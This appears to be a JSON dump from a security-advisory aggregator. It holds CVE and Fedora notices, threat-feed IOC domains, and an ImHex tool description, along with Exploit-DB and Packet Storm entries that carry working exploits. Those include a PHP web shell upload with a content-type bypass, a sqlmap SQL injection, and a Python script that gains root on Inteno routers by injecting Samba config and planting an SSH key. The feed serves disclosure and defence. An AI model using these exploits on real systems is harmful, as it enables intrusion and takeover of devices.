{"cve": [{"lastseen": "2021-01-19T12:37:56", "description": "** DISPUTED ** fs/nfsd/nfs3xdr.c in the Linux kernel through 5.10.8, when there is an NFS export of a subdirectory of a filesystem, allows remote attackers to traverse to other parts of the filesystem via READDIRPLUS. NOTE: some parties argue that such a subdirectory export is not intended to prevent this attack; see also the exports(5) no_subtree_check default behavior.", "edition": 1, "cvss3": {}, "published": "2021-01-19T07:15:00", "title": "CVE-2021-3178", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-3178"], "modified": "2021-01-19T07:15:00", "cpe": [], "id": "CVE-2021-3178", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3178", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "fedora": [{"lastseen": "2021-01-19T06:33:09", "bulletinFamily": "unix", "cvelist": [], "description": "flatpak is a system for building, distributing and running sandboxed desktop applications on Linux. See https://wiki.gnome.org/Projects/SandboxedApps for more information. ", "modified": "2021-01-19T01:52:27", "published": "2021-01-19T01:52:27", "id": "FEDORA:B6BE0309FF1D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: flatpak-1.8.5-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-18T04:37:24", "bulletinFamily": "unix", "cvelist": ["CVE-2019-25013"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. 
", "modified": "2021-01-18T01:35:42", "published": "2021-01-18T01:35:42", "id": "FEDORA:F0266309ACD0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: glibc-2.32-3.fc33", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-16T02:59:32", "bulletinFamily": "unix", "cvelist": [], "description": "flatpak is a system for building, distributing and running sandboxed desktop applications on Linux. See https://wiki.gnome.org/Projects/SandboxedApps for more information. ", "modified": "2021-01-16T01:35:15", "published": "2021-01-16T01:35:15", "id": "FEDORA:1BA3E30CF28F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: flatpak-1.10.0-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-16T02:59:32", "bulletinFamily": "unix", "cvelist": ["CVE-2020-28374"], "description": "Kernel-headers includes the C header files that specify the interface between the Linux kernel and userspace libraries and programs. The header files define structures and constants that are needed for building most standard programs and are also needed for rebuilding the glibc package. ", "modified": "2021-01-16T01:35:11", "published": "2021-01-16T01:35:11", "id": "FEDORA:C6B8230CF2BC", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: kernel-headers-5.10.7-200.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-16T02:59:32", "bulletinFamily": "unix", "cvelist": ["CVE-2020-28374"], "description": "Kernel-headers includes the C header files that specify the interface between the Linux kernel and userspace libraries and programs. The header files define structures and constants that are needed for building most standard programs and are also needed for rebuilding the glibc package. 
", "modified": "2021-01-16T01:24:20", "published": "2021-01-16T01:24:20", "id": "FEDORA:8068430CBD46", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: kernel-headers-5.10.7-100.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackread": [{"lastseen": "2021-01-18T19:07:18", "bulletinFamily": "blog", "cvelist": [], "description": "By [Sudais Asif](<https://www.hackread.com/author/sudais/>)\n\nAccording to their father, the kids were able to bypass the Linux Mint screensaver lock not once but twice.\n\nThis is a post from HackRead.com Read the original post: ['Child's Play' - Kids breach and bypass Linux Mint screensaver lock](<https://www.hackread.com/kids-breach-bypass-linux-mint-screensaver-lock/>)", "modified": "2021-01-18T18:35:40", "published": "2021-01-18T18:35:40", "id": "HACKREAD:A6EB028653B33477E63F8FD8A3A77E14", "href": "https://www.hackread.com/kids-breach-bypass-linux-mint-screensaver-lock/", "type": "hackread", "title": "\u2018Child\u2019s Play\u2019 \u2013 Kids breach and bypass Linux Mint screensaver lock", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2021-01-18T08:31:18", "description": "", "published": "2021-01-18T00:00:00", "type": "exploitdb", "title": "Life Insurance Management System 1.0 - File Upload RCE (Authenticated)", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-18T00:00:00", "id": "EDB-ID:49440", "href": "https://www.exploit-db.com/exploits/49440", "sourceData": "# Exploit Title: Life Insurance Management System 1.0 - File Upload RCE (Authenticated)\r\n# Date: 15/1/2021\r\n# Exploit Author: Aitor Herrero\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html\r\n# Version: 1.0\r\n# Tested on: Windows /linux /\r\n\r\nLogin in the application\r\n\r\nGo to Clients and you can add new client o modify existent\r\n\r\nClick examination botton and upload a 
test.php with content:\r\n\r\n\"<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd =\r\n($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>\"\r\n\r\nClick Upload and intercept with burpsuite\r\n\r\nChange the content type to image/png\r\n\r\nGo to the path\r\n\r\nhttp://localhost:8080/lims/uploads/test.php?cmd=dir", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49440"}, {"lastseen": "2021-01-18T08:31:18", "description": "", "published": "2021-01-18T00:00:00", "type": "exploitdb", "title": "Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-17867"], "modified": "2021-01-18T00:00:00", "id": "EDB-ID:49438", "href": "https://www.exploit-db.com/exploits/49438", "sourceData": "# Exploit Title: Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)\r\n# Date: 2020-03-29\r\n# Exploit Author: Henrik Pedersen\r\n# Vendor Homepage: https://intenogroup.com/\r\n# Version: Iopsys <3.16.5\r\n# Fixed Version: Iopsys 3.16.5\r\n# Tested on: Kali Linux 2020.4 against an Inteno DG200 Router\r\n\r\n# Description:\r\n# It was possible to add newlines to nearly any of the samba share options when creating a new Samba share in Inteno\u2019s Iopsys routers before 3.16.5. 
This made it possible to change the configurations in smb.conf, giving root access to the filesystem.\r\n\r\n# Patch in release\r\n# notes: https://dev.iopsys.eu/iopsys/iopsyswrt/blob/9d2366785d5a7d896359436149c2dbd3caec1a8e/releasenotes/release-notes-IOP-OS-version-3.16.x.txt\r\n\r\n# Exploit writeup: https://xistens.gitlab.io/xistens/exploits/iopsys-root-filesystem-access/\r\n\r\n#!/usr/bin/python3\r\nimport json\r\nimport sys\r\nimport os\r\nimport time\r\nimport argparse\r\nfrom websocket import create_connection\r\nfrom impacket.smbconnection import SMBConnection\r\nfrom impacket.examples.smbclient import MiniImpacketShell\r\n\r\n\"\"\"\r\nRoot filesystem access via sambashare name configuration option in Inteno's Iopsys < 3.16.5\r\n\r\nUsage: smbexploit.py -u <username> -p <password> -k <path/to/id_rsa.pub> <host>\r\n\r\nRequires:\r\nimpacket\r\nwebsocket-client\r\n\r\nOn Windows:\r\npyreadline\r\n\r\n\"\"\"\r\n\r\ndef ubusAuth(host, username, password):\r\n \"\"\"\r\n https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py\r\n \"\"\"\r\n ws = create_connection(f\"ws://{host}\", header = [\"Sec-WebSocket-Protocol: ubus-json\"])\r\n req = json.dumps({\r\n \"jsonrpc\": \"2.0\", \"method\": \"call\",\r\n \"params\": [\r\n \"00000000000000000000000000000000\",\"session\",\"login\",\r\n {\"username\": username,\"password\": password}\r\n ],\r\n \"id\": 666\r\n })\r\n ws.send(req)\r\n response = json.loads(ws.recv())\r\n ws.close()\r\n try:\r\n key = response.get('result')[1].get('ubus_rpc_session')\r\n except IndexError:\r\n return None\r\n return key\r\n\r\ndef ubusCall(host, key, namespace, argument, params={}):\r\n \"\"\"\r\n https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py\r\n \"\"\"\r\n ws = create_connection(f\"ws://{host}\", header = [\"Sec-WebSocket-Protocol: ubus-json\"])\r\n req = json.dumps({\"jsonrpc\": \"2.0\", \"method\": \"call\",\r\n \"params\": [key,namespace,argument,params],\r\n \"id\": 666})\r\n 
ws.send(req)\r\n response = json.loads(ws.recv())\r\n ws.close()\r\n try:\r\n result = response.get('result')[1]\r\n except IndexError:\r\n if response.get('result')[0] == 0:\r\n return True\r\n return None\r\n return result\r\n\r\ndef auth(host, user, password):\r\n print(\"Authenticating...\")\r\n key = ubusAuth(host, user, password)\r\n if not key:\r\n print(\"[-] Auth failed!\")\r\n sys.exit(1)\r\n print(f\"[+] Auth successful\")\r\n return key\r\n\r\ndef smb_put(args):\r\n username = \"\"\r\n password = \"\"\r\n\r\n try:\r\n smbClient = SMBConnection(args.host, args.host, sess_port=445)\r\n smbClient.login(username, password, args.host)\r\n\r\n print(\"Reading SSH key\")\r\n try:\r\n with open(args.key_path, \"r\") as fd:\r\n sshkey = fd.read()\r\n except IOError:\r\n print(f\"[-] Error reading {args.sshkey}\")\r\n \r\n print(\"Creating temp file for authorized_keys\")\r\n try:\r\n with open(\"authorized_keys\", \"w\") as fd:\r\n fd.write(sshkey)\r\n path = os.path.realpath(fd.name)\r\n except IOError:\r\n print(\"[-] Error creating authorized_keys\")\r\n\r\n shell = MiniImpacketShell(smbClient)\r\n shell.onecmd(\"use pwned\")\r\n shell.onecmd(\"cd /etc/dropbear\")\r\n shell.onecmd(f\"put {fd.name}\") \r\n\r\n print(\"Cleaning up...\")\r\n os.remove(path)\r\n except Exception as e:\r\n print(\"[-] Error connecting to SMB share:\")\r\n print(str(e))\r\n sys.exit(1)\r\n\r\ndef main(args):\r\n payload = \"pwned]\\npath=/\\nguest ok=yes\\nbrowseable=yes\\ncreate mask=0755\\nwriteable=yes\\nforce user=root\\n[abc\"\r\n key = auth(args.host, args.user, args.passwd)\r\n print(\"Adding Samba share...\")\r\n smbcheck = json.dumps(ubusCall(args.host, key, \"uci\", \"get\", {\"config\":\"samba\"}))\r\n if \"pwned\" in smbcheck:\r\n print(\"[*] Samba share seems to already exist, skipping\")\r\n else:\r\n smba = ubusCall(args.host, key, \"uci\", \"add\", {\r\n \"config\": \"samba\", \r\n \"type\":\"sambashare\", \r\n \"values\": {\r\n \"name\": payload, \r\n 
\"read_only\": \"no\", \r\n \"create_mask\":\"0775\", \r\n \"dir_mask\":\"0775\",\r\n \"path\": \"/mnt/\", \r\n \"guest_ok\": \"yes\"\r\n }\r\n })\r\n if not smba:\r\n print(\"[-] Adding Samba share failed!\")\r\n sys.exit(1)\r\n\r\n print(\"Enabling Samba...\")\r\n smbe = ubusCall(args.host, key, \"uci\", \"set\",\r\n {\"config\":\"samba\", \"type\":\"samba\", \"values\":\r\n {\"interface\":\"lan\"}})\r\n if not smbe:\r\n print(\"[-] Enabling Samba failed!\")\r\n sys.exit(1)\r\n\r\n print(\"Committing changes...\")\r\n smbc = ubusCall(args.host, key, \"uci\", \"commit\",\r\n {\"config\":\"samba\"})\r\n if not smbc:\r\n print(\"[-] Committing changes failed!\")\r\n sys.exit(1)\r\n \r\n if args.key_path:\r\n # Allow the service to start\r\n time.sleep(2)\r\n smb_put(args)\r\n print(f\"[+] Exploit complete. Try \\\"ssh -i id_rsa root@{args.host}\\\"\")\r\n else:\r\n print(\"[+] Exploit complete, SMB share added.\")\r\n\r\ndef parse_args(args):\r\n \"\"\" Create the arguments \"\"\"\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-u\", dest=\"user\", help=\"Username\", default=\"user\")\r\n parser.add_argument(\"-p\", dest=\"passwd\", help=\"Password\", default=\"user\")\r\n parser.add_argument(\"-k\", dest=\"key_path\", help=\"Public ssh key path\")\r\n parser.add_argument(dest=\"host\", help=\"Target host\")\r\n\r\n if len(sys.argv) < 2:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n return parser.parse_args(args)\r\n\r\nif __name__ == \"__main__\":\r\n main(parse_args(sys.argv[1:]))", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/49438"}, {"lastseen": "2021-01-18T08:31:18", "description": "", "published": "2021-01-18T00:00:00", "type": "exploitdb", "title": "Life Insurance Management System 1.0 - 'client_id' SQL Injection", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-18T00:00:00", "id": "EDB-ID:49439", "href": "https://www.exploit-db.com/exploits/49439", 
"sourceData": "# Exploit Title: Life Insurance Management System 1.0 - 'client_id' SQL Injection\r\n# Date: 15/1/2021\r\n# Exploit Author: Aitor Herrero\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html\r\n# Version: 1.0\r\n# Tested on: Windows /linux /\r\n\r\nLogin in the application\r\n\r\nGo to clientStatus.php?client_id=\r\n\r\nsqlmap -u \"http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1\r\n<http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129%27%20and%20sleep(20)%20and%20%271%27=%271>\"", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49439"}], "packetstorm": [{"lastseen": "2021-01-18T16:22:48", "description": "", "published": "2021-01-18T00:00:00", "type": "packetstorm", "title": "Life Insurance Management System 1.0 SQL Injection", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-18T00:00:00", "id": "PACKETSTORM:160980", "href": "https://packetstormsecurity.com/files/160980/Life-Insurance-Management-System-1.0-SQL-Injection.html", "sourceData": "`# Exploit Title: Life Insurance Management System 1.0 - 'client_id' SQL Injection \n# Date: 15/1/2021 \n# Exploit Author: Aitor Herrero \n# Vendor Homepage: https://www.sourcecodester.com \n# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html \n# Version: 1.0 \n# Tested on: Windows /linux / \n \nLogin in the application \n \nGo to clientStatus.php?client_id= \n \nsqlmap -u \"http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1 \n<http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129%27%20and%20sleep(20)%20and%20%271%27=%271>\" \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": 
"https://packetstormsecurity.com/files/download/160980/lims10-sql.txt"}, {"lastseen": "2021-01-18T16:20:01", "description": "", "published": "2021-01-18T00:00:00", "type": "packetstorm", "title": "Life Insurance Management System 1.0 Shell Upload", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-18T00:00:00", "id": "PACKETSTORM:160981", "href": "https://packetstormsecurity.com/files/160981/Life-Insurance-Management-System-1.0-Shell-Upload.html", "sourceData": "`# Exploit Title: Life Insurance Management System 1.0 - File Upload RCE (Authenticated) \n# Date: 15/1/2021 \n# Exploit Author: Aitor Herrero \n# Vendor Homepage: https://www.sourcecodester.com \n# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html \n# Version: 1.0 \n# Tested on: Windows /linux / \n \nLogin in the application \n \nGo to Clients and you can add new client o modify existent \n \nClick examination botton and upload a test.php with content: \n \n\"<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = \n($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>\" \n \nClick Upload and intercept with burpsuite \n \nChange the content type to image/png \n \nGo to the path \n \nhttp://localhost:8080/lims/uploads/test.php?cmd=dir \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160981/lims10-shell.txt"}, {"lastseen": "2021-01-18T16:23:55", "description": "", "published": "2021-01-18T00:00:00", "type": "packetstorm", "title": "Inteno IOPSYS 3.16.4 Root Filesystem Access", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-17867"], "modified": "2021-01-18T00:00:00", "id": "PACKETSTORM:160988", "href": "https://packetstormsecurity.com/files/160988/Inteno-IOPSYS-3.16.4-Root-Filesystem-Access.html", "sourceData": "`# Exploit Title: Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated) \n# Date: 2020-03-29 \n# Exploit Author: Henrik 
Pedersen \n# Vendor Homepage: https://intenogroup.com/ \n# Version: Iopsys <3.16.5 \n# Fixed Version: Iopsys 3.16.5 \n# Tested on: Kali Linux 2020.4 against an Inteno DG200 Router \n \n# Description: \n# It was possible to add newlines to nearly any of the samba share options when creating a new Samba share in Inteno\u2019s Iopsys routers before 3.16.5. This made it possible to change the configurations in smb.conf, giving root access to the filesystem. \n \n# Patch in release \n# notes: https://dev.iopsys.eu/iopsys/iopsyswrt/blob/9d2366785d5a7d896359436149c2dbd3caec1a8e/releasenotes/release-notes-IOP-OS-version-3.16.x.txt \n \n# Exploit writeup: https://xistens.gitlab.io/xistens/exploits/iopsys-root-filesystem-access/ \n \n#!/usr/bin/python3 \nimport json \nimport sys \nimport os \nimport time \nimport argparse \nfrom websocket import create_connection \nfrom impacket.smbconnection import SMBConnection \nfrom impacket.examples.smbclient import MiniImpacketShell \n \n\"\"\" \nRoot filesystem access via sambashare name configuration option in Inteno's Iopsys < 3.16.5 \n \nUsage: smbexploit.py -u <username> -p <password> -k <path/to/id_rsa.pub> <host> \n \nRequires: \nimpacket \nwebsocket-client \n \nOn Windows: \npyreadline \n \n\"\"\" \n \ndef ubusAuth(host, username, password): \n\"\"\" \nhttps://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py \n\"\"\" \nws = create_connection(f\"ws://{host}\", header = [\"Sec-WebSocket-Protocol: ubus-json\"]) \nreq = json.dumps({ \n\"jsonrpc\": \"2.0\", \"method\": \"call\", \n\"params\": [ \n\"00000000000000000000000000000000\",\"session\",\"login\", \n{\"username\": username,\"password\": password} \n], \n\"id\": 666 \n}) \nws.send(req) \nresponse = json.loads(ws.recv()) \nws.close() \ntry: \nkey = response.get('result')[1].get('ubus_rpc_session') \nexcept IndexError: \nreturn None \nreturn key \n \ndef ubusCall(host, key, namespace, argument, params={}): \n\"\"\" 
\nhttps://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py \n\"\"\" \nws = create_connection(f\"ws://{host}\", header = [\"Sec-WebSocket-Protocol: ubus-json\"]) \nreq = json.dumps({\"jsonrpc\": \"2.0\", \"method\": \"call\", \n\"params\": [key,namespace,argument,params], \n\"id\": 666}) \nws.send(req) \nresponse = json.loads(ws.recv()) \nws.close() \ntry: \nresult = response.get('result')[1] \nexcept IndexError: \nif response.get('result')[0] == 0: \nreturn True \nreturn None \nreturn result \n \ndef auth(host, user, password): \nprint(\"Authenticating...\") \nkey = ubusAuth(host, user, password) \nif not key: \nprint(\"[-] Auth failed!\") \nsys.exit(1) \nprint(f\"[+] Auth successful\") \nreturn key \n \ndef smb_put(args): \nusername = \"\" \npassword = \"\" \n \ntry: \nsmbClient = SMBConnection(args.host, args.host, sess_port=445) \nsmbClient.login(username, password, args.host) \n \nprint(\"Reading SSH key\") \ntry: \nwith open(args.key_path, \"r\") as fd: \nsshkey = fd.read() \nexcept IOError: \nprint(f\"[-] Error reading {args.sshkey}\") \n \nprint(\"Creating temp file for authorized_keys\") \ntry: \nwith open(\"authorized_keys\", \"w\") as fd: \nfd.write(sshkey) \npath = os.path.realpath(fd.name) \nexcept IOError: \nprint(\"[-] Error creating authorized_keys\") \n \nshell = MiniImpacketShell(smbClient) \nshell.onecmd(\"use pwned\") \nshell.onecmd(\"cd /etc/dropbear\") \nshell.onecmd(f\"put {fd.name}\") \n \nprint(\"Cleaning up...\") \nos.remove(path) \nexcept Exception as e: \nprint(\"[-] Error connecting to SMB share:\") \nprint(str(e)) \nsys.exit(1) \n \ndef main(args): \npayload = \"pwned]\\npath=/\\nguest ok=yes\\nbrowseable=yes\\ncreate mask=0755\\nwriteable=yes\\nforce user=root\\n[abc\" \nkey = auth(args.host, args.user, args.passwd) \nprint(\"Adding Samba share...\") \nsmbcheck = json.dumps(ubusCall(args.host, key, \"uci\", \"get\", {\"config\":\"samba\"})) \nif \"pwned\" in smbcheck: \nprint(\"[*] Samba share seems to already exist, 
skipping\") \nelse: \nsmba = ubusCall(args.host, key, \"uci\", \"add\", { \n\"config\": \"samba\", \n\"type\":\"sambashare\", \n\"values\": { \n\"name\": payload, \n\"read_only\": \"no\", \n\"create_mask\":\"0775\", \n\"dir_mask\":\"0775\", \n\"path\": \"/mnt/\", \n\"guest_ok\": \"yes\" \n} \n}) \nif not smba: \nprint(\"[-] Adding Samba share failed!\") \nsys.exit(1) \n \nprint(\"Enabling Samba...\") \nsmbe = ubusCall(args.host, key, \"uci\", \"set\", \n{\"config\":\"samba\", \"type\":\"samba\", \"values\": \n{\"interface\":\"lan\"}}) \nif not smbe: \nprint(\"[-] Enabling Samba failed!\") \nsys.exit(1) \n \nprint(\"Committing changes...\") \nsmbc = ubusCall(args.host, key, \"uci\", \"commit\", \n{\"config\":\"samba\"}) \nif not smbc: \nprint(\"[-] Committing changes failed!\") \nsys.exit(1) \n \nif args.key_path: \n# Allow the service to start \ntime.sleep(2) \nsmb_put(args) \nprint(f\"[+] Exploit complete. Try \\\"ssh -i id_rsa root@{args.host}\\\"\") \nelse: \nprint(\"[+] Exploit complete, SMB share added.\") \n \ndef parse_args(args): \n\"\"\" Create the arguments \"\"\" \nparser = argparse.ArgumentParser() \nparser.add_argument(\"-u\", dest=\"user\", help=\"Username\", default=\"user\") \nparser.add_argument(\"-p\", dest=\"passwd\", help=\"Password\", default=\"user\") \nparser.add_argument(\"-k\", dest=\"key_path\", help=\"Public ssh key path\") \nparser.add_argument(dest=\"host\", help=\"Target host\") \n \nif len(sys.argv) < 2: \nparser.print_help() \nsys.exit(1) \n \nreturn parser.parse_args(args) \n \nif __name__ == \"__main__\": \nmain(parse_args(sys.argv[1:])) \n \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/160988/intenoiopsys3164-bypass.txt"}], "rst": [{"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **magos-linux[.]ru** in [RST Threat Feed](https://rstcloud.net/profeed) with score **24**.\n First seen: 
2020-12-22T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 185[.]199.108.153,185.199.110.153,185.199.109.153,185.199.111.153\nWhois:\n Created: 2009-05-07 20:00:00, \n Registrar: REGRURU, \n Registrant: Private Person.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:238A021A-0F7E-332E-A8A8-6B1297956476", "href": "", "published": "2021-01-18T00:00:00", "title": "RST Threat feed. IOC: magos-linux.ru", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **jukykq[.]linux-dude.net** in [RST Threat Feed](https://rstcloud.net/profeed) with score **24**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 212[.]95.56.89\nWhois:\n Created: 2000-06-14 20:54:19, \n Registrar: unknown, \n Registrant: Registercom Inc.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:8BBD390F-636E-3849-9F45-3F2A680011A2", "href": "", "published": "2021-01-18T00:00:00", "title": "RST Threat feed. IOC: jukykq.linux-dude.net", "type": "rst", "cvss": {}}, {"lastseen": "2020-11-06T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **www[.]linux-repository-updates.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2019-12-15T03:00:00, Last seen: 2020-11-06T03:00:00.\n IOC tags: **cryptomining**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-15T00:00:00", "id": "RST:0C9BB3E3-05CA-35A0-9DE9-FD6AD623CCC5", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. 
IOC: www.linux-repository-updates.com", "type": "rst", "cvss": {}}, {"lastseen": "2020-11-06T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **home-linux[.]evolution-project.go.ro** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-04-17T03:00:00, Last seen: 2020-11-06T03:00:00.\n IOC tags: **cryptomining**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-04-17T00:00:00", "id": "RST:ADF2B3D3-477C-3D00-B6B9-F1D23F62F994", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. IOC: home-linux.evolution-project.go.ro", "type": "rst", "cvss": {}}, {"lastseen": "2020-11-06T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **exec[.]evolution-project.go.ro** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-11-06T03:00:00, Last seen: 2020-11-06T03:00:00.\n IOC tags: **cryptomining**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-11-06T00:00:00", "id": "RST:F041A0BC-45FC-3B30-BD1E-AE96D121B4D1", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. IOC: exec.evolution-project.go.ro", "type": "rst", "cvss": {}}], "kitploit": [{"lastseen": "2021-01-17T23:34:58", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-nYPBTey058M/X_u5FUn683I/AAAAAAAAU-0/WhOudGKf_EY72V7zRGUsnkcjqXR6fR_fQCNcBGAsYHQ/s1920/ImHex_6.png>)\n\n \n\n\nA [ Hex Editor ](<https://www.kitploit.com/search/label/Hex%20Editor> \"Hex Editor\" ) for Reverse Engineers, Programmers and people that value their eye sight when working at 3 AM. 
\n\n \n** Features ** \n\n\n * Featureful hex view \n * Byte patching \n * Patch management \n * Copy bytes as feature \n * Bytes \n * Hex string \n * C, C++, C#, Rust, Python, Java & JavaScript array \n * ASCII-Art hex view \n * HTML self contained div \n * String and hex search \n * Colorful highlighting \n * Goto from start, end and current cursor position \n * Custom C++-like pattern language for parsing highlighting a file's content \n * Automatic loading based on MIME type \n * arrays, pointers, structs, unions, enums, bitfields, using declarations, little and big endian support, conditionals and much more! \n * Useful error messages, syntax highlighting and error marking \n * Data importing \n * Base64 files \n * IPS and IPS32 patches \n * Data exporting \n * IPS and IPS32 patches \n * Data [ inspector ](<https://www.kitploit.com/search/label/Inspector> \"inspector\" ) allowing interpretation of data as many different types (little and big endian) \n * Huge file support with fast and efficient loading \n * String search \n * Copying of strings \n * Copying of demangled strings \n * File [ hashing ](<https://www.kitploit.com/search/label/Hashing> \"hashing\" ) support \n * CRC16 and CRC32 with custom initial values and polynomials \n * MD4, MD5 \n * SHA-1, SHA-224, SHA-256, SHA-384, SHA-512 \n * Disassembler supporting many different architectures \n * ARM32 (ARM, Thumb, Cortex-M, AArch32) \n * ARM64 \n * MIPS (MIPS32, MIPS64, MIPS32R6, Micro) \n * x86 (16-bit, 32-bit, 64-bit) \n * PowerPC (32-bit, 64-bit) \n * SPARC \n * IBM SystemZ \n * xCORE \n * M68K \n * TMS320C64X \n * M680X \n * Ethereum \n * Bookmarks \n * Region highlighting \n * Comments \n * Data Analyzer \n * File magic-based file parser and MIME type database \n * Byte distribution graph \n * Entropy graph \n * Highest and average entropy \n * Encrypted / Compressed file detection \n * Helpful tools \n * Itanium and MSVC demangler \n * ASCII table \n * Regex replacer \n * Mathematical expression 
evaluator (Calculator) \n * Hexadecimal Color picker \n * Built-in cheat sheet for pattern language and Math evaluator \n * Doesn't burn out your retinas when used in late-night sessions \n\n \n\n\n** Screenshots ** \n\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-P0hYfOcXru8/X_u5NgOCLNI/AAAAAAAAU-4/ie1tXx-JB14aYV0vldtdYlbeQ9NQZaRGQCNcBGAsYHQ/s1920/ImHex_6.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-iYPBXtI95pQ/X_u5NoqHjdI/AAAAAAAAU-8/eKmTABFICVIyaLsZYHFeYnOajgIPaRG-wCNcBGAsYHQ/s1920/ImHex_7.png>)\n\n \n\n\n** Pattern Language ** \n\n\nThe custom C-like Pattern Language developed and used by ImHex is easy to read, understand and learn. A guide with all features of the language can be found [ in the wiki ](<https://github.com/WerWolv/ImHex/wiki/Pattern-Language-Guide> \"in the wiki\" ) or a simpler version in ImHex under ` Help -> Pattern Language Cheat Sheet `\n\n \n** Additional Files ** \n\n\nFor format patterns, includable libraries and magic files, check out the [ ImHex-Patterns ](<https://github.com/WerWolv/ImHex-Patterns> \"ImHex-Patterns\" ) repository. Feel free to PR your own files there as well! \n\n \n** Nightly builds ** \n\n\nSee latest nightly builds on the artifacts result of the Build action [ here ](<https://github.com/WerWolv/ImHex/actions?query=workflow%3ABuild> \"here\" ) . \n\nNOTE: ** We currently only provide nightly builds for macOS (x86_64) **\n\n \n** Compiling ** \n\n\nYou need a C++20 compatible [ compiler ](<https://www.kitploit.com/search/label/Compiler> \"compiler\" ) such as GCC 10.2.0 to compile ImHex. 
